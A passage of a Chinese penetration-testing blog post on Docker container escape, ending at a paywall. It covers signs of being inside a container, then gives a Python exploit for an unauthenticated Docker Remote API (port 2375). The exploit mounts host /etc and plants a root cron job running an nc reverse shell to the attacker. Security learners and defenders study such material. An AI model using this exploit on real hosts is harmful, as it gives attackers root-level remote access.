基于网络安全的Docker逃逸

最新推荐文章于 2025-04-09 00:28:05 发布
最新推荐文章于 2025-04-09 00:28:05 发布
阅读量3k 收藏 17
点赞数 2
文章标签: docker web安全 容器 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kali_Ma/article/details/127436994
版权

如何判断当前机器是否为Docker容器环境

Metasploit中的checkcontainer模块、(判断是否为虚拟机,checkvm模块)

搭配Docker逃逸学习教程
在这里插入图片描述

1. 检查根目录下是否存在.dockerenv文件

image.png
image.png

2. 检查/proc/1/cgroup是否存在还有docker字符串

image.png
image.png

cat /proc/1/cgroup

image.png

3. 检查是否存在container环境变量

通过env\PATH来检查是否有docker相关的环境变量,来进一步判断

4. 其他检测方式

如检测mount、fdisk -l查看硬盘、判断PID 1的进程名等也可用来辅助判断

Docker逃逸方式

1. 危险的配置导致Docker逃逸

由于"纵深防御" 和 "最小权限"等理念和原则落地,越来越难以直接利用漏洞来进行利用。另一方面,公开的漏洞,安全运维人员能够及时将其修复,当然,不免存在漏网之鱼。相反,更多的是利用错误的、危险的配置来进行利用,不仅仅Docker逃逸,其他漏洞也是,比如生产环境开启Debug模式导致漏洞利用等等。

Docker已经将容器运行时的Capabilities黑名单机制改为如今的默认禁止所有Capabilities,再以白名单方式赋予容器运行所需的最小权限

docket remote api未授权访问导致逃逸

docker swarm是管理docker集群的工具。主从管理、默认通过2375端口通信。绑定了一个Docker Remote API的服务,可以通过HTTP、Python、调用API来操作Docker

Docker Remote API的端口2375端口

访问http://your-ip:2375/version

火狐打开如下,证明存在未授权访问漏洞
image.png

在kali上开启nc监听本地端口,用来接收反弹shell

反弹Shell exp:

import docker 
client = docker.DockerClient(base_url='http://your-ip:2375/') 
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

执行脚本,shell会反弹到kali主机上

Github上的exp:https://github.com/Tycx2ry/docker_api_vul
image.png

另一种方式

首先访问http://your-ip:2375/version
image.png

访问http://ip:2375/containers/json

最低0.47元/天 解锁文章
kali_Ma
关注
【漏洞复现】Docker runC 容器逃逸漏洞(CVE-2019-5736)
李火火的安全圈
12-09 5705
2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在GitHub上公布。
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
玄道的网安博客
12-27 1405
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
--cap-add=NET_BIND_SERVICE一共包含哪些部分?使用场景是什么?底层原理是什么?
最新发布
长风破浪会有时的博客
04-09 360
Docker运行容器时的一个参数。
docker逃逸漏洞(CVE-2019-5736)
热门推荐
chaojixiaojingang
12-23 1万+
1.漏洞描述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在...
docker容器_Docker 容器逃逸漏洞
weixin_35207054的博客
12-27 260
2020年12月1日,阿里云应急响应中心监测到 containerd 官方发布安全更新,修复了 Docker 容器逃逸漏洞(CVE-2020-15257)。漏洞描述Containerd 是一个控制 runC 的守护进程,提供命令行客户端和 API,用于在一个机器上管理容器。在特定网络条件下,攻击者可通过访问containerd-shim API,从而实现Docker容器逃逸。阿里云应急响...
【云原生渗透】- docker runc容器逃逸漏洞(CVE-2019-5736)
神棍之路
01-11 1462
运行时存在安全漏洞,攻击者可以通过特定的容器镜像或者exec操作,来获取到宿主机的runc执行时的文件句柄,并修改掉runc的二进制文件,从而可以在宿主机上以root身份执行命令。containerd 向下通过 containerd-shim 结合 runC,使得引擎可以独立升级,避免之前 Docker Daemon 升级会导致所有容器不可用的问题。将该payload拷贝到docker容器中(这就是模拟攻击者获取了docker容器权限,在容器中上传payload进行docker逃逸
docker逃逸漏洞总结
weixin_35756130的博客
02-13 281
Docker 逃逸漏洞主要有两种:第一种是由于容器中的应用程序的设计错误而导致的;第二种是由于容器安全设置不当而导致的。为了避免这两种漏洞,建议在部署容器时,应该采用一些安全的措施,如控制容器的访问权限、限制容器的网络通信等。 ...
基于网络安全Docker 逃逸
zxcvbnmasdflzl的博客
04-04 386
基于网络安全Docker 逃逸
Docker安全配置与优化(一)
qq_42190530的博客
02-21 994
Docker安全配置与优化(一)
docker 逃逸突破边界
技术笔记
02-11 948
docker 逃逸边界突破
Docker 安全加固 - 权限控制、私有仓库和敏感信息保护
mmc123125的博客
11-18 392
安全Docker 使用过程中不可忽视的部分,做好 Docker 安全加固工作,能够帮助我们降低风险,保护敏感数据。今天我们聊了权限控制、私有仓库、敏感信息保护、网络安全加固以及防止容器逃逸等方面的内容,希望你能通过这些方法让你的 Docker 环境更加坚不可摧。毕竟,只有大家共同加固安全,才会避免“无聊”的数据泄露和不必要的麻烦啊!🚀。
Docker逃逸
weixin_57385269的博客
02-16 369
runc是一个底层服务工具,runC 管理容器的创建,运行,销毁等
Docker逃逸漏洞浅讲
qq_73630656的博客
10-08 1557
篡改了系统的 runc 文件,在其中加入恶意代码,在下一次 run exec (启动命令行)的时候导致恶意代码执行
Docker 逃逸 漏洞复现
Jack_chao_的博客
03-27 1520
CVE-2020-15257-host模式容器逃逸漏洞分析
docker逃逸漏洞复现
风雨来花满楼的博客
07-20 532
如何判断是否在docker工作环境下 docker环境下:ls -alh /.dockerenv , 非docker环境,没有这个.dockerenv文件的(定制化比较高的docker系统也可能没有这个文件) 查询系统进程的cgroup信息 cat /proc/1/cgroup CVE-2020-15257 容器逃逸漏洞利用 CVE-2020-15257的利用条件——net namespace(–net=host)与宿主机共享 以以下命令运行容器 docker run --rm --net=
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
SuperherRo的博客
03-03 1644
1、云原生-Docker安全-容器逃逸&内核漏洞 2、云原生-Docker安全-容器逃逸&版本漏洞 3、云原生-Docker安全-容器逃逸&CDK自动化
关于Docker逃逸
Aiwin的博客
03-22 2620
Docker逃逸复现
Docker容器逃逸
weixin_44720441的博客
08-23 1500
Docker容器逃逸指的是攻击者通过劫持容器化业务逻辑或直接控制(CaaS等合法获得容器控制权的场景)等方式,已经获得了容器内某种权限下的命令执行能力;攻击者利用这种命令执行能力,借助一些手段进而获得该容器所在的直接宿主机(当遇到“物理机运行虚拟机,虚拟机再运行容器”的场景时,该场景下的直接宿主机指容器外层的虚拟机)上某种权限下的命令执行能力。
Kubernetes攻防 | 容器逃逸 - Docker in Docker
Trollz的博客
03-15 583
Kubernetes attack and defense | container escape - Docker in Docker
Docker中的Root User Namespaces安全分析
"这篇文档是Phil Estes在ContainerCon 2015大会上关于消除Docker中的Root用户命名空间的演讲。Phil Estes是IBM Cloud开放技术部门的高级技术成员...这篇文档对于理解Docker安全性和用户命名空间的角色是非常有价值的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值